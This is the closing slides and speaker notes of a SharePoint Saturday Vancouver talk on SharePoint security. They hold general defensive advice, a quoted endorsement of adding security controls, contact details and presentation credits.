✘Don’t fall into “Tikcky box security”
✘Understand the business needs and culture
✘Carefull with custom code. Always use SSDLC techniques
✘Teach your staff about “Social engineering”
✘Deploy of Defense-in-Depth protection
Spot Solutions Ltd.SharePoint Saturday Vancouver Ian Naumenko, CISSP
49. Mike Fleck, Co-Founder of CipherPoint Software wrote…
”If your house gets broken into, but you like the house,
keep the house and buy a security system. People love
SharePoint for the collaboration efficiencies the platform
brings to the enterprise. Add to SharePoint the right set
of administrative and technical security controls, and
you’ve got a winning combination. It is possible to use
the SharePoint platform for use cases involving highly
sensitive data!”
Conclusion…
Ian Naumenko, CISSP, Spot Solutions Ltd.
50. thanks!
Any questions?
You can find me at
ian@spotsolutions.com
https://www.linkedin.com/in/iannaumenko
@ignhot
Credits
Special thanks to all the people who made and released these awesome slides for free:
Presentation template by SlidesCarnival
Photographs by Unsplash
SharePoint Saturday Vancouver
Editor's Notes
We as administrators of business, and of the technology that supports business need to be concerned….
Seen SP sites locked down to the point that it can’t be used
Story about reading clients emails
/_layouts/settings.aspx
Interoperability (pronounced IHN-tuhr-AHP-uhr-uh-BIHL-ih-tee) is a property of a product or system, whose interfaces are completely understood, to work with other products or systems, present or future, without any restricted access or implementation
Some SP installations are not useable because there is too much security